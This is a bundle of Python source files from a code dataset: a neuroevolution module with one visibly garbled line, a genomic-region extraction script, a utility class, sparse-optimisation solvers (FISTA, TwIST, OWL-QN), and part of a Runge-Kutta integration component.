netweights\n\nclass Generation():\n\tdef __init__(self):\n\t\tself.individuals = []\n\t\tself.mutation_rate = 0.1\n\t\tself.elitism = 0.2\n\t\tself.population = POPULATION\n\t\tself.random_behavior = 0.1\n\n\tdef add(self,new):\n\t\t'''new is a individual, add it into list with order'''\n\t\tindex = 0\n\t\tfor i,nn in enumerate(self.individuals):\n\t\t\t# sort from high to low\n\t\t\tif new.score > nn.score:\n\t\t\t\tindex = i\n\t\t\t\tbreak\n\t\tself.individuals.insert(index,new)\n\n\tdef breed(self,ind1,ind2):\n\t\tchildweights = deepcopy(ind1.netweights)\n\t\tweight_n = [] # e.g [6,6] for a [2,3,2] network\n\t\tfor w in ind2.netweights:\n\t\t\tweight_n.append(w.size)\n\t\tfor i,n in zip(range(len(ind2.netweights)),weight_n):\n\t\t\tfor j in range(n):\n\t\t\t\tif np.random.random()<0.5:\n\t\t\t\t\tchildweights[i].flat[j] = ind2.netweights[i].flat[j]\n\t\t\t\t# mutation\n\t\t\t\tif np.random.random() len(self.individuals):\n\t\t\t\tmax_n = 0\n\n\tdef output(self,path='gene.txt'):\n\t\twith open(path,'a') as f:\n\t\t\tfor x in self.individuals:\n\t\t\t\tf.write(str(x.score)+',')\n\nclass Generations():\n\tdef __init__(self):\n\t\tself.generations = []\n\n\t@staticmethod\n\tdef readlog(path):\n\t\tdata = []\n\t\ttry:\n\t\t\twith open(path,'r') as f:\n\t\t\t\tw = f.read()\n\t\t\tp1 = r'\\[array\\(\\[([^\\)]*)\\]\\)'\n\t\t\ta = re.findall(p1,w)\n\t\t\tp2 = r', array\\(\\[([^\\)]*)\\]\\)'\n\t\t\tb = re.findall(p2,w)\n\t\t\tp3 = r'\\[([^\\]]*)\\]'\n\t\t\ttofloat = lambda x: list(map(float,x.split(',')))\n\t\t\tpipeline = lambda x: list(map(tofloat,re.findall(p3,x)))\n\t\t\ta = list(map(pipeline,a))\n\t\t\tb = list(map(pipeline,b))\n\t\t\tfor i,j in zip(a,b):\n\t\t\t\tdata.append([np.array(i),np.array(j)])\n\t\t\treturn data\n\t\texcept IOError:\n\t\t\treturn data\n\n\tdef first_generation(self):\n\t\toutweight = Generations.readlog('lastgeneration.txt')\n\t\tout = []\n\t\tfor w in outweight[:POPULATION]:\n\t\t\tnn = NeuroNetwork()\n\t\t\tnn.weights = w\n\t\t\tout.append(nn)\n\t\twhile len(out) < POPULATION:\n\t\t\tnn = NeuroNetwork()\n\t\t\tout.append(nn)\n\t\t\toutweight.append(nn.weights)\n\t\tself.generations.append(Generation())\n\t\treturn out,outweight\n\n\tdef next_generation(self):\n\t\tif len(self.generations) == 0:\n\t\t\treturn False\n\t\tgen = self.generations[-1].generate_next()\n\t\tself.generations.append(Generation())\n\t\treturn gen\n\n\tdef add_indi(self,indi):\n\t\tif len(self.generations) == 0:\n\t\t\treturn False\n\t\treturn self.generations[-1].add(indi)\n\n\tdef output(self):\n\t\t'''wirte the last generation into file'''\n\t\tself.generations[-1].output()\n\n\n\n\nclass NeuroEvolution():\n\tdef __init__(self):\n\t\tself.gene = Generations()\n\n\tdef restart(self):\n\t\tself.gene = Generations()\n\n\tdef next_generation(self):\n\t\tnetworks = []\n\t\tif len(self.gene.generations) == 0:\n\t\t\tnn,networks = self.gene.first_generation()\n\t\telse:\n\t\t\tnetworks = self.gene.next_generation()\n\t\t\tnn = []\n\t\t\tfor item in networks:\n\t\t\t\tn = NeuroNetwork()\n\t\t\t\tn.weights = item\n\t\t\t\tnn.append(n)\n\t\thistoric = 1 # number of generations keeps in gene\n\t\tif historic != 0:\n\t\t\tL = len(self.gene.generations)\n\t\t\tif L > historic:\n\t\t\t\tself.gene.generations = self.gene.generations[-historic:]\n\t\treturn nn\n\n\tdef network_score(self,score,nn):\n\t\tself.gene.add_indi(individual(score,nn.weights))\n\n\tdef output(self):\n\t\tself.gene.output()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"neuro_evolution.py","file_name":"neuro_evolution.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"607547261","text":"#!/usr/bin/env python3\nimport argparse\nfrom misc.region_reader import Region_Reader\nfrom typing import List, Tuple\n\n\ndef main():\n '''\n Main method to read in arguments from stdin and perform lookup with\n Region_Reader\n '''\n args = parse_args()\n args, reader = validate_args(args)\n with reader:\n locations = decode_regions(args['regions'],\n reader, args['list_sort'])\n write_regions(reader, locations)\n\n\ndef parse_args(args: List[str] = None) -> argparse.Namespace:\n '''\n Read in input arguments or the supplied list of strings\n Returns a dictionary of options\n '''\n parser = argparse.ArgumentParser(\n description='retrieve regions from indexed file.')\n\n parser.add_argument('regions',\n nargs='+',\n help='one or more region ids to retrieve')\n parser.add_argument('--filename',\n required=True,\n help='fa.gz file to look for regions')\n parser.add_argument('--list_sort',\n action='store_true',\n help='sort regions by the input order. Defualt sort by'\n ' disk location')\n parser.add_argument('--suppress_header',\n action='store_true',\n help='suppress printing of header line in stdout')\n\n return vars(parser.parse_args(args))\n\n\ndef validate_args(args: argparse.Namespace) -> Tuple[argparse.Namespace,\n Region_Reader]:\n '''\n Performs checks and conversions of input, raises ValueErrors if invalid\n '''\n reader = Region_Reader(args['filename'],\n as_fa=False,\n suppress_header=args['suppress_header'],\n num_lines=15)\n\n args['regions'] = [reader.convert_region(r) for r in args['regions']]\n\n return args, reader\n\n\ndef decode_regions(regions: List[int],\n reader: Region_Reader,\n retain_sort: bool) -> List[int]:\n '''\n Converts list of regions to file locations based on index dictionary\n Retain_sort controls if the output list order is determined by the\n region order or the disk location (i.e. values of index dict)\n '''\n\n result = [reader.decode_region(r) for r in regions]\n\n if retain_sort:\n return result\n else:\n return sorted(result)\n\n\ndef write_regions(reader: Region_Reader, locations: List[int]) -> None:\n '''\n Writes the regions specified by index to stdout\n If print_header is false, ignore first line after location\n '''\n for location in locations:\n reader.read_location(location)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"code/analyze/extract_region.py","file_name":"extract_region.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"47663944","text":"from sys import argv\nfrom os import getcwd\nfrom random import randint\nfrom datetime import datetime\n\n\nclass Utils:\n\n @staticmethod\n def obter_inteiro_aleatorio(inicio, fim):\n return randint(inicio, fim)\n\n @staticmethod\n def obter_data_e_hora_atual():\n return datetime.now().strftime('%d/%m/%Y %H:%M')\n\n @staticmethod\n def obter_caminho_atual():\n caminho = getcwd()\n\n caminho_de_execucao = Utils.obter_caminho_de_execucao()\n if caminho_de_execucao != '':\n caminho = f'{caminho}/{caminho_de_execucao}'\n\n return caminho\n\n @staticmethod\n def obter_caminho(caminho_do_arquivo):\n caminho = Utils.obter_caminho_atual()\n\n if Utils.verificar_modo_producao():\n caminho = f'{caminho}/lib'\n\n caminho = f'{caminho}/{caminho_do_arquivo}'\n\n return caminho\n\n @staticmethod\n def obter_parametros():\n return argv\n\n @staticmethod\n def obter_caminho_de_execucao():\n return '/'.join(argv[0].split('/')[:-1])\n\n @staticmethod\n def verificar_modo_dev():\n if '--dev' in argv:\n return True\n return False\n\n @staticmethod\n def verificar_modo_teste():\n if '--test' in argv:\n return True\n return False\n\n @staticmethod\n def verificar_modo_producao():\n if not Utils.verificar_modo_dev() and not Utils.verificar_modo_teste():\n return True\n return False\n","sub_path":"src/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"182395647","text":"import numpy as np\n\nheader = \"%+6s\\t%+8s\\t%+8s\\t%+8s\\t%+8s\\t%+8s\" % (\"#\", \"f(x)\", \"g(x)\", \"F(x)\", \"gradf(x)\", \"nonzeros\")\ncontentFormat = \"%6d\\t%4e\\t%4e\\t%4e\\t%4e\\t%6d\"\nprintHeader = lambda n_iter: (n_iter == 1)\nprintContent = lambda n_iter: (n_iter < 5) or ((n_iter > 3) and (n_iter % 10 == 0))\n\ndef fista(input_size, eval_fun, regulariser,\n regulariser_function=None, thresholding_function=None, initial_x=0,\n L0=1., eta=2., update_L=True,\n verbose=1, verbose_output=0):\n \"\"\"\n FISTA (Fast Iterative Shrinkage Thresholding Algorithm) is an algorithm to solve the convex minimization of\n y = f(x) + regulariser * g(x) with g(x) can be a continuous and non-differentiable function, such as L1 norm or total variation in compressed sensing.\n If f(x) = || Ax - b ||^2, then the gradient is Df(x) = 2 * A.T * (Ax - b).\n This is from A. Beck and M. Teboulle's paper in 2009: A Fast Iterative Shrinkage-Thresholding Algorithm for Linear Inverse Problems.\n \n Arguments\n ---------\n input_size: (int or tuple of ints) shape of the signal\n eval_fun: (function with two outputs) evaluation function to calculate f(x) and its gradient, Df(x)\n regulariser: (float) regulariser weights to be multiplied with the regulariser function, g(x)\n regulariser_function: (function or string) the regulariser function, g(x), or string to specify the regulariser, such as \"l1\" or \"tv\" (default: reg_l1)\n thresholding_function: (function) function to apply thresholding (or denoising) to the signal in the gradient descent.\n This is ignored if regulariser function is a string (default: soft_threshold_l1)\n initial_x: (int or array) 0 for zeros, 1 for random, or array with shape = input_size to specify the initial guess of the signal (default: 0)\n L0: (float) initial guess of the inverse of step size (default: 1)\n eta: (float) the increment of L0 if the step size is too large (default: 2)\n update_L: (bool or int) flag whether to update L or keep it fix (default: True)\n verbose: (bool or int) flag to show the iteration update (default: True)\n verbose_output: (bool or int) indicate whether the function should return the full information or just the signal (default: False)\n \n Returns\n -------\n The signal if (verbose_output == False) or a dictionary with the output signal (x), number of iterations (n_iter), \n evaluation function (fx), gradient (gradx), and regulariser function (gx) values\n \"\"\"\n ############################### argument check ###############################\n eta = float(eta)\n initial_x = _get_initial_x(initial_x, input_size)\n regulariser_fun, thresholding_fun = _get_regulariser(regulariser, regulariser_function, thresholding_function)\n \n ############################### initialisation ###############################\n L = float(L0)\n x = initial_x\n y_next = x\n t_next = 1.\n F_prev = None\n \n ############################### main iteration ###############################\n n_iter = 1\n while True:\n # obtain the parameters from the previous iteration\n L_prev = L\n x_prev = x\n y = y_next\n t = t_next\n \n # calculate the function and the gradient of the evaluation function\n f_y, grad_y = eval_fun(y)\n g_y = regulariser_fun(y)\n F = f_y + g_y\n \n # print the message\n if verbose == 1:\n if printHeader(n_iter): print(header)\n if printContent(n_iter): print(contentFormat % (n_iter, f_y, g_y, F, np.sum(np.abs(grad_y)), np.sum(y > 0)))\n \n # check convergence and update F_prev\n if F_prev != None and np.abs(F - F_prev) / (1e-10+np.abs(F_prev)) < 1e-6: break\n F_prev = F\n \n # find i_k for L=eta**i_k*L such that F(pL(yk)) <= QL(pL(yk), yk)\n L_test = L_prev\n while True:\n pLy = thresholding_fun(y - 1./L_test * grad_y, float(regulariser)/L_test) # gradient descent with thresholding afterwards\n if not update_L: break\n \n pLy_min_y = pLy - y\n reg_pLy = regulariser_fun(pLy)\n \n f_pLy, grad_pLy = eval_fun(pLy)\n F_pLy = f_pLy + reg_pLy\n Q_pLy = f_y + np.sum(pLy_min_y * grad_y) + L_test/2. * np.sum(pLy_min_y * pLy_min_y) + reg_pLy\n \n if (F_pLy <= Q_pLy): break\n L_test *= eta\n \n # calculate the next parameters\n L = L_test\n x = pLy\n t_next = (1. + np.sqrt(1 + 4.*t**2))/2.\n y_next = x + ((t - 1.) / t_next) * (x - x_prev)\n n_iter += 1\n \n ############################### output ###############################\n if verbose_output:\n return {\"x\": y, \"n_iter\": n_iter, \"fx\": f_y, \"gradx\": grad_y, \"gx\": g_y}\n else:\n return y\n\ndef twist(input_size, eval_fun, regulariser,\n regulariser_function=None, thresholding_function=None, initial_x=0,\n alpha=0, beta=0, lmbda1=1e-4, max_eigval=2., monotone=True,\n verbose=1, verbose_output=0):\n \"\"\"\n TwIST (Two Steps Iterative Shrinkage Thresholding) is an algorithm to solve the convex minimization of\n y = f(x) + regulariser * g(x) with g(x) can be a continuous and non-differentiable function, such as L1 norm or total variation in compressed sensing.\n If f(x) = || Ax - b ||^2, then the gradient is Df(x) = 2 * A.T * (Ax - b).\n This is from J. M. Bioucas-Dias and M. A. T. Figueiredo's paper in 2007: A New TwIST: Two-Step Iterative Shrinkage/Thresholding Algorithms for Image Restoration.\n \n Arguments\n ---------\n input_size: (int or tuple of ints) shape of the signal\n eval_fun: (function with two outputs) evaluation function to calculate f(x) and its gradient, Df(x)\n regulariser: (float) regulariser weights to be multiplied with the regulariser function, g(x)\n regulariser_function: (function or string) the regulariser function, g(x), or string to specify the regulariser, such as \"l1\" or \"tv\" (default: reg_l1)\n thresholding_function: (function) function to apply thresholding (or denoising) to the signal in the gradient descent.\n This is ignored if regulariser function is a string (default: soft_threshold_l1)\n initial_x: (int or array) 0 for zeros, 1 for random, or array with shape = input_size to specify the initial guess of the signal (default: 0)\n alpha: (float between 0 and 1) a step size in the algorithm (see eq. 16) (default: 2. / (1. + np.sqrt(1. - rho0^2)))\n beta: (float between 0 and 1) a step size in the algorithm (see eq. 16) (default: alpha * 2. / (lmbda1 + 1))\n lmbda1: (float) chi parameter in the algorithm (see eq. 20).\n Set lmbda1 = 1e-4 for severely ill conditioned problem, 1e-2 for mildly ill, and 1 for unitary operator (default: 1e-4)\n max_eigval: (float) the guessed largest eigenvalue of A.T*T which equals to the inverse of the step size (default: 2)\n monotone: (bool or int) indicate whether to enforce monotonic function's value decrease in every iteration (default: True)\n verbose: (bool or int) flag to show the iteration update (default: True)\n verbose_output: (bool or int) indicate whether the function should return the full information or just the signal (default: False)\n \n Returns\n -------\n The signal if (verbose_output == False) or a dictionary with the output signal (x), number of iterations (n_iter), \n evaluation function (fx), gradient (gradx), and regulariser function (gx) values\n \"\"\"\n \n ############################### argument check ###############################\n # twist parameters\n lmbdaN = 1.\n rho0 = (1. - lmbda1/lmbdaN) / (1. + lmbda1/lmbdaN)\n if alpha == 0:\n alpha = 2. / (1. + np.sqrt(1. - rho0*rho0))\n if beta == 0:\n beta = alpha * 2. / (lmbda1 + lmbdaN)\n initial_x = _get_initial_x(initial_x, input_size)\n regulariser_fun, thresholding_fun = _get_regulariser(regulariser, regulariser_function, thresholding_function)\n \n ############################### initialisation ###############################\n regulariser = float(regulariser)\n x = initial_x\n x_mid = initial_x\n \n # calculate the initial objective function\n y, grad_y = eval_fun(x)\n F_prev = y + regulariser_fun(x)\n \n ############################### main iteration ###############################\n n_iter = 1\n twist_iter = 0\n while True:\n while True:\n y_mid, grad_y_mid = eval_fun(x_mid)\n thresholding_x_mid = thresholding_fun(x_mid - grad_y_mid/max_eigval, regulariser/max_eigval)\n \n if twist_iter == 0: # do an IST iteration\n y_next, grad_y_next = eval_fun(thresholding_x_mid)\n F = y_next + regulariser_fun(thresholding_x_mid)\n \n # if not decreasing, then increase the max_eigval by 2\n if F > F_prev:\n max_eigval *= 2.\n if max_eigval > 1e10: break\n # print(max_eigval)\n else:\n twist_iter = 1\n x = x_mid\n x_mid = thresholding_x_mid\n break\n else:\n # perform TwIST\n z = (1 - alpha) * x + (alpha - beta) * x_mid + beta * thresholding_x_mid\n y_next, grad_y_next = eval_fun(z)\n F = y_next + regulariser_fun(z)\n \n # if F > F_prev and enforcing monotone, do an IST iteration with double eigenvalue\n if (F > F_prev) and monotone:\n twist_iter = 0\n else:\n x = x_mid\n x_mid = z\n break\n \n if max_eigval > 1e10: break\n \n # print the message\n if verbose == 1:\n if printHeader(n_iter): print(header)\n if printContent(n_iter): print(contentFormat % (n_iter, y_next, F-y_next, F, np.sum(np.abs(grad_y_next)), np.sum(x_mid > 0)))\n \n # check convergence and update F_prev\n if F_prev != None and np.abs(F - F_prev) / (1e-10+np.abs(F_prev)) < 1e-6: break\n F_prev = F\n \n # prepare the variables for the next iteration\n n_iter += 1\n \n ############################### output ###############################\n if verbose_output:\n return {\"x\": x_mid, \"n_iter\": n_iter, \"fx\": y_next, \"gradx\": grad_y_next, \"gx\": F-y_next}\n else:\n return x_mid\n\ndef owlqn(input_size, eval_fun, regulariser,\n initial_x=0, m=10, beta=0.7, gamma=0.8,\n verbose=1, verbose_output=0):\n \"\"\"\n OWL-QN (Orthant Wise Limited-memory Quasi Newton) is an algorithm to solve the convex minimization of y = f(x) + regulariser * |x|_1.\n This algorithm is based on L-BFGS that takes the second order (estimated Hessian matrix) during the search.\n If f(x) = || Ax - b ||^2, then the gradient is Df(x) = 2 * A.T * (Ax - b).\n This is from G. Andrew and J. Gao's paper in 2007: Scalable training of L1-regularized log-linear models.\n \n Arguments\n ---------\n input_size: (int or tuple of ints) shape of the signal\n eval_fun: (function with two outputs) evaluation function to calculate f(x) and its gradient, Df(x)\n regulariser: (float) regulariser weights to be multiplied with the regulariser function, g(x)\n regulariser_function: (function or string) the regulariser function, g(x), or string to specify the regulariser, such as \"l1\" or \"tv\" (default: reg_l1)\n thresholding_function: (function) function to apply thresholding (or denoising) to the signal in the gradient descent.\n This is ignored if regulariser function is a string (default: soft_threshold_l1)\n initial_x: (int or array) 0 for zeros, 1 for random, or array with shape = input_size to specify the initial guess of the signal (default: 0)\n alpha: (float between 0 and 1) a step size in the algorithm (see eq. 16) (default: 2. / (1. + np.sqrt(1. - rho0^2)))\n beta: (float between 0 and 1) a step size in the algorithm (see eq. 16) (default: alpha * 2. / (lmbda1 + 1))\n lmbda1: (float) chi parameter in the algorithm (see eq. 20).\n Set lmbda1 = 1e-4 for severely ill conditioned problem, 1e-2 for mildly ill, and 1 for unitary operator (default: 1e-4)\n max_eigval: (float) the guessed largest eigenvalue of A.T*T which equals to the inverse of the step size (default: 2)\n monotone: (bool or int) indicate whether to enforce monotonic function's value decrease in every iteration (default: True)\n verbose: (bool or int) flag to show the iteration update (default: True)\n verbose_output: (bool or int) indicate whether the function should return the full information or just the signal (default: False)\n \n Returns\n -------\n The signal if (verbose_output == False) or a dictionary with the output signal (x), number of iterations (n_iter), \n evaluation function (fx), gradient (gradx), and regulariser function (gx) values\n \"\"\"\n ############################### argument check ###############################\n initial_x = _get_initial_x(initial_x, input_size)\n \n _regulariser_fun = lambda x: regulariser * np.sum(np.abs(x))\n _constraint_orthant = lambda var, orthant: var * (np.sign(var) == orthant)\n \n ############################### initialisation ###############################\n S = [] # list to store the displacements\n Y = [] # list to store the differences in gradient\n x_next = initial_x\n f_x_next, grad_x_next = eval_fun(x_next)\n g_x_next = _regulariser_fun(x_next)\n alpha = 1.\n \n def _compute_direction_lbfgs(S, Y, grad):\n # S: displacement history\n # Y: difference in gradient history\n # grad: first order gradient direction\n # compute the gradient for maximisation\n \n N = len(Y)\n if N == 0: return grad\n \n q = grad\n alphas = [None for i in range(len(Y))]\n rhos = [None for i in range(len(Y))]\n for i in range(len(Y)-1,-1,-1):\n # compute the rho, alpha (and save them), and update q\n rhos[i] = 1./np.sum(Y[i] * S[i])\n alphas[i] = rhos[i] * np.sum(S[i] * q)\n q = q - alphas[i] * Y[i]\n \n H_0 = 1. * np.sum(S[-1] * Y[-1]) / np.sum(Y[-1] * Y[-1])\n z = H_0 * q\n \n for i in range(len(Y)):\n beta = rhos[i] * np.sum(Y[i] * z)\n z = z + S[i] * (alphas[i] - beta)\n \n return z\n \n ############################### main iteration ###############################\n n_iter = 1\n while True:\n f_x = f_x_next\n grad_x = grad_x_next\n g_x = g_x_next\n F_x = f_x + g_x\n x = x_next\n \n # print the message\n if verbose == 1:\n if printHeader(n_iter): print(header)\n if printContent(n_iter): print(contentFormat % (n_iter, f_x, g_x, F_x, np.sum(np.abs(grad_x)), np.sum(x > 0)))\n \n # compute the pseudo-gradient of f by computing the directional gradient of f first\n sgnx = np.sign(x)\n sgnx_0 = (sgnx == 0)\n grad_pos_x = grad_x + regulariser * (sgnx + sgnx_0)\n grad_neg_x = grad_x + regulariser * (sgnx - sgnx_0)\n pgrad_x = grad_pos_x * (grad_pos_x < 0) + grad_neg_x * (grad_neg_x > 0)\n \n # choose the orthant\n orthant = np.sign(x) * (x != 0) - np.sign(pgrad_x) * (x == 0)\n \n # compute the inverse hessian multiplied by the pseudo gradient from the S & Y history\n grad_2nd = _compute_direction_lbfgs(S, Y, pgrad_x)\n \n # constraint the gradient direction\n grad_2nd_orthant = _constraint_orthant(grad_2nd, np.sign(pgrad_x))\n \n # do line search\n alpha = 1.\n while True:\n x_next = _constraint_orthant(x - grad_2nd_orthant * alpha, orthant)\n f_x_next, grad_x_next = eval_fun(x_next)\n g_x_next = _regulariser_fun(x_next)\n if f_x_next + g_x_next <= F_x + gamma * np.sum(pgrad_x * (x_next - x)): break\n alpha *= beta\n # n += 1\n # print(n)\n \n # check convergence\n if np.abs(f_x_next - f_x) / (1e-10 + np.abs(f_x)) < 1e-6: break\n n_iter += 1\n \n # update the histories\n S.append(x_next - x)\n Y.append(grad_x_next - grad_x)\n if len(S) > m: S.pop(0)\n if len(Y) > m: Y.pop(0)\n \n ############################### output ###############################\n if verbose_output:\n return {\"x\": x_next, \"n_iter\": n_iter, \"fx\": f_x_next, \"gradx\": grad_x_next, \"gx\": g_x_next}\n else:\n return x_next\n\ndef _get_initial_x(initial_x, input_size):\n if not hasattr(initial_x, \"__iter__\"):\n if initial_x == 0: # zeros initialisation\n initial_x = np.zeros(input_size)\n elif initial_x == 1: # random initialisation\n initial_x = np.random.random(input_size)\n return initial_x\n\ndef _get_regulariser(regulariser, regulariser_function, thresholding_function):\n if hasattr(regulariser_function, '__call__'): # if the regulariser fun is callable, then set the regulariser function as regulariser * regulariser_fun\n regulariser_fun = lambda x: regulariser * regulariser_function(x)\n if not hasattr(thresholding_function, '__call__'): raise (\"Argument error: the thresholding_function argument must be a function\")\n thresholding_fun = thresholding_function\n \n elif type(regulariser_function) == type(\"str\"): # if regulariser function is specifid as a string\n regulariser_str = regulariser_function.lower()\n \n if regulariser_str == \"l1\":\n thresholding_fun = soft_threshold_l1\n regulariser_fun = lambda x: regulariser * reg_l1(x)\n \n elif regulariser_str == 'iso_tv' or regulariser_str == 'tv':\n thresholding_fun = soft_threshold_iso_tv\n regulariser_fun = lambda x: regulariser * reg_iso_tv(x)\n \n else:\n raise(\"Argument error: Unknown regulariser %s\" % regulariser_str)\n \n return regulariser_fun, thresholding_fun\n","sub_path":"anoa/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":18398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"45004878","text":"import numpy as np\nimport openmdao.api as om\n\nfrom ...options import options as dymos_options\n\nfrom .ode_evaluation_group import ODEEvaluationGroup\nfrom ...utils.misc import get_rate_units\nfrom ...utils.introspection import filter_outputs, classify_var\n\n\nrk_methods = {'rk4': {'a': np.array([[0.0, 0.0, 0.0, 0.0],\n [0.5, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.0, 0.0],\n [0.0, 0.0, 1.0, 0.0]]),\n 'b': np.array([1/6, 1/3, 1/3, 1/6]),\n 'c': np.array([0, 1/2, 1/2, 1])},\n\n '3/8': {'a': np.array([[0.0, 0.0, 0.0, 0.0],\n [1/3, 0.0, 0.0, 0.0],\n [-1/3, 1.0, 0.0, 0.0],\n [1.0, -1.0, 1.0, 0.0]]),\n 'b': np.array([1/8, 3/8, 3/8, 1/8]),\n 'c': np.array([0, 1/3, 2/3, 1])},\n\n 'euler': {'a': np.array([[0.0]]),\n 'b': np.array([1.0]),\n 'c': np.array([0.0])},\n\n 'ralston': {'a': np.array([[0, 0], [2/3, 0]]),\n 'c': np.array([0, 2/3]),\n 'b': np.array([1/4, 3/4])},\n\n 'rkf': {'a': np.array([[0, 0, 0, 0, 0],\n [1/4, 0, 0, 0, 0],\n [3/32, 9/32, 0, 0, 0],\n [1932/2197, -7200/2197, 7296/2197, 0, 0],\n [439/216, -8, 3680/513, -845/4104, 0],\n [-8/27, 2, -3544/2565, 1859/4104, -11/40]]),\n 'c': np.array([0, 1/4, 3/8, 12/13, 1, 1/2]),\n 'b': np.array([16/135, 0, 6656/12825, 28561/56430, -9/50, 2/55]),\n 'b_star': np.array([25/216, 0, 1408/2565, 2197/4104, -1/5, 0])},\n\n 'rkck': {'a': np.array([[0, 0, 0, 0, 0],\n [1/5, 0, 0, 0, 0],\n [3/40, 9/40, 0, 0, 0],\n [3/10, -9/10, 6/5, 0, 0],\n [-11/54, 5/2, -70/27, 35/27, 0],\n [1631/55296, 175/512, 575/13828, 44275/110592, 253/4096]]),\n 'c': np.array([0, 1/5, 3/10, 3/5, 1, 7/8]),\n 'b': np.array([2825/27648, 0, 18575/48384, 13525/55296, 277/14336, 1/4]),\n 'b_star': np.array([37/378, 0, 250/621, 125/594, 512/1771, 0])},\n\n 'dopri': {'a': np.array([[0, 0, 0, 0, 0, 0],\n [1/5, 0, 0, 0, 0, 0],\n [3/40, 9/40, 0, 0, 0, 0],\n [44/45, -56/15, 32/9, 0, 0, 0],\n [19372/6561, -25360/2187, 64448/6561, -212/729, 0, 0],\n [9017/3168, -355/33, 46732/5247, 49/176, -5103/18656, 0],\n [35/384, 0, 500/1113, 125/192, -2187/6784, 11/84]]),\n 'c': np.array([0, 1/5, 3/10, 4/5, 8/9, 1, 1]),\n 'b': np.array([35/384, 0, 500/1113, 125/192, -2187/6784, 11/84, 0]),\n 'b_star': np.array([5179/57600, 0, 7571/16695, 393/640, -92097/339200, 187/2100, 1/40])}\n }\n\n\nclass RKIntegrationComp(om.ExplicitComponent):\n \"\"\"\n A component to perform explicit integration using a generic Runge-Kutta scheme.\n\n This component contains a sub-Problem with a component that will be solved over num_nodes\n points instead of creating num_nodes instances of that same component and connecting them\n together.\n\n Parameters\n ----------\n ode_class : class\n The class of the OpenMDAO system to be used to evaluate the ODE in this Group.\n time_options : OptionsDictionary\n OptionsDictionary of time options.\n state_options : dict of {str: OptionsDictionary}\n For each state variable, a dictionary of its options, keyed by name.\n parameter_options : dict of {str: OptionsDictionary}\n For each parameter, a dictionary of its options, keyed by name.\n control_options : dict of {str: OptionsDictionary}\n For each control variable, a dictionary of its options, keyed by name.\n polynomial_control_options : dict of {str: OptionsDictionary}\n For each polynomial variable, a dictionary of its options, keyed by name.\n timeseries_options : dict\n The timeseries options associated with the parent phase. This is used to access\n requested timeseries outputs. Some options regarding timeseries are not applicable\n to the RungeKutta integration.\n complex_step_mode : bool\n If True, allocate internal memory as complex to support complex-step differentiation.\n grid_data : GridData\n The GridData instance pertaining to the phase to which this ODEEvaluationGroup belongs.\n standalone_mode : bool\n When True, this component will perform its configuration during setup. This is useful\n for unittesting this component when not embedded in a larger system.\n **kwargs : dict\n Additional keyword arguments passed to Group.\n \"\"\"\n def __init__(self, ode_class, time_options=None,\n state_options=None, parameter_options=None, control_options=None,\n polynomial_control_options=None, timeseries_options=None, complex_step_mode=False,\n grid_data=None, standalone_mode=True, **kwargs):\n super().__init__(**kwargs)\n self.ode_class = ode_class\n self.time_options = time_options\n self.state_options = state_options\n self.parameter_options = parameter_options or {}\n self.control_options = control_options or {}\n self.polynomial_control_options = polynomial_control_options or {}\n self.timeseries_options = timeseries_options or {}\n self._prob = None\n self._complex_step_mode = complex_step_mode\n self._grid_data = grid_data\n self._TYPE = complex if complex_step_mode else float\n\n self.x_size = 0\n self.p_size = 0\n self.u_size = 0\n self.up_size = 0\n self.theta_size = 0\n self.Z_size = 0\n\n self._totals_of_names = []\n self._totals_wrt_names = []\n\n # If _standalone_mode is True, this component will fully perform all of its setup at setup\n # time. If False, it will need to have configure_io called on it to properly finish its\n # setup.\n self._standalone_mode = standalone_mode\n self._no_check_partials = not dymos_options['include_check_partials']\n\n def initialize(self):\n \"\"\"\n Declare options for the RKIntegrationComp.\n \"\"\"\n self.options.declare('method', types=(str,), default='rk4',\n desc='The explicit Runge-Kutta scheme to use. One of' +\n str(list(rk_methods.keys())))\n self.options.declare('num_steps_per_segment', types=(int,), default=10)\n self.options.declare('ode_init_kwargs', types=dict, allow_none=True, default=None)\n\n def _setup_subprob(self):\n self._prob = p = om.Problem(comm=self.comm)\n p.model.add_subsystem('ode_eval',\n ODEEvaluationGroup(self.ode_class, self.time_options,\n self.state_options,\n self.parameter_options,\n self.control_options,\n self.polynomial_control_options,\n ode_init_kwargs=self.options['ode_init_kwargs'],\n grid_data=self._grid_data),\n promotes_inputs=['*'],\n promotes_outputs=['*'])\n\n p.setup(force_alloc_complex=self._complex_step_mode)\n p.final_setup()\n self._prob.set_complex_step_mode(self._complex_step_mode)\n\n def _setup_time(self):\n if self._standalone_mode:\n self._configure_time_io()\n\n def _configure_time_io(self):\n num_output_rows = self._num_output_rows\n\n self._totals_of_names.append('time')\n self._totals_wrt_names.extend(['time', 't_initial', 't_duration'])\n\n self.add_input('t_initial', shape=(1,), units=self.time_options['units'])\n self.add_input('t_duration', shape=(1,), units=self.time_options['units'])\n self.add_output('t_final', shape=(1,), units=self.time_options['units'])\n self.add_output('time', shape=(num_output_rows, 1), units=self.time_options['units'])\n self.add_output('time_phase', shape=(num_output_rows, 1), units=self.time_options['units'])\n\n self.declare_partials('t_final', 't_initial', val=1.0)\n self.declare_partials('t_final', 't_duration', val=1.0)\n self.declare_partials('time', 't_initial', val=1.0)\n self.declare_partials('time', 't_duration', val=1.0)\n self.declare_partials('time_phase', 't_duration', val=1.0)\n\n def _setup_states(self):\n if self._standalone_mode:\n self._configure_states_io()\n\n def _configure_states_io(self):\n num_output_rows = self._num_output_rows\n\n # The total size of the entire state vector\n self.x_size = 0\n\n self._state_input_names = {}\n self._state_output_names = {}\n\n # The indices of each state in x\n self.state_idxs = {}\n\n # The indices of each state's initial value in Z\n self._state_idxs_in_Z = {}\n\n for state_name, options in self.state_options.items():\n self._state_input_names[state_name] = f'states:{state_name}'\n self._state_output_names[state_name] = f'states_out:{state_name}'\n\n 